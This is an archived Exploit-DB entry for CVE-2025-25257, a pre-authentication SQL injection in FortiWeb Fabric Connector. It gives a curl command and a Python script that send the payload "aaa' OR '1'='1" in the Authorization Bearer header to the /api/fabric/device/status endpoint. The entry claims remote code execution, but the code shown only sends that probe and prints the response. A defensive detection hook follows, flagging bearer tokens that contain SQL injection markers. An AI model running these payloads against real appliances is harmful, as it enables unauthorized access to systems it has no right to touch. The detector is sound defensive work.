
[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution

Source: Exploit DB · Archived Mar 16, 2026



EDB-ID: 52473
CVE: CVE-2025-25257
Author: MILAD KARIMI (EX3PTIONAL)
Type: WEBAPPS
Platform: MULTIPLE
Date: 2026-02-04

# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257

Overview

CVE-2025-25257 is a pre-authentication SQL injection vulnerability in Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x. The flaw allows an unauthenticated attacker to inject SQL into the vulnerable API endpoint through the Authorization header, which can lead to Remote Code Execution (RCE).

PoC

```sh
curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
  https://<fortiweb-ip>/api/fabric/device/status
```

PoC Python

```python
import argparse

import requests


def test_sqli(base_url):
    # Vulnerable Fabric Connector endpoint; the payload travels in the Bearer token.
    url = f"{base_url}/api/fabric/device/status"
    headers = {
        "Authorization": "Bearer aaa' OR '1'='1"
    }
    try:
        # verify=False: FortiWeb appliances commonly run self-signed certificates.
        response = requests.get(url, headers=headers, verify=False, timeout=10)
        print(f"Status code: {response.status_code}")
        print("Response body:")
        print(response.text)
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL CVE-2025-25257 FortiWeb")
    parser.add_argument("base_url", help="Base URL of FortiWeb (ex: https://10.0.0.5)")
    args = parser.parse_args()
    test_sqli(args.base_url)

# python3 src/poc.py https://10.0.0.5
```
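A defender-side check for the probe pattern shown above, added here as an example and not part of the Exploit-DB entry: a reverse-proxy or WAF hook that flags FortiWeb API requests whose Bearer token carries characters an opaque token would not contain. The allow-listed token alphabet and the sample requests are constructed assumptions; the page does not document FortiWeb's real token format.

```python
import re
from dataclasses import dataclass

# Endpoint named in the advisory; other Fabric Connector paths are not listed on the page.
FABRIC_STATUS_PATH = "/api/fabric/device/status"

# Assumed alphabet of a legitimate opaque bearer token (constructed, not FortiWeb's spec).
TOKEN_ALLOWED = re.compile(r"^[A-Za-z0-9._~+/=-]+$")
# Characters and keywords that have no business inside a token but do in an injection.
SQL_MARKERS = re.compile(r"(?i)(['\"]|--|/\*|;|\bor\b|\band\b|\bunion\b|\bselect\b)")


@dataclass
class Finding:
    path: str
    reason: str
    on_advisory_endpoint: bool


def inspect_request(method, path, headers):
    """Return a Finding when the Authorization header looks like a SQL injection probe."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None  # only bearer-token requests are in scope for this check
    token = auth[len("Bearer "):]
    if TOKEN_ALLOWED.fullmatch(token):
        return None  # token is well-formed; nothing to report
    m = SQL_MARKERS.search(token)
    reason = (f"SQL marker {m.group(0)!r} in bearer token" if m
              else "non-token characters in bearer token")
    return Finding(path=path, reason=reason,
                   on_advisory_endpoint=(path == FABRIC_STATUS_PATH))


# Constructed sample requests, not captured traffic: the advisory's payload, a clean
# token, and the same payload against an unrelated path.
SAMPLE_REQUESTS = [
    ("GET", FABRIC_STATUS_PATH, {"Authorization": "Bearer aaa' OR '1'='1"}),
    ("GET", FABRIC_STATUS_PATH, {"Authorization": "Bearer 9f3c2e1a8b7d6c5e4f3a2b1c"}),
    ("GET", "/api/v2/cmdb/system/status", {"Authorization": "Bearer x' OR 'a'='a"}),
]


def scan(reqs):
    """Run inspect_request over a batch and keep only the findings."""
    return [f for f in (inspect_request(*r) for r in reqs) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        tag = "ADVISORY-ENDPOINT" if f.on_advisory_endpoint else "OTHER-PATH"
        print(f"ALERT [{tag}] {f.path}: {f.reason}")
```

The allow-list, not the SQL keyword list, is what blocks the request; the keyword match only enriches the alert text, so variants that avoid the listed keywords are still caught.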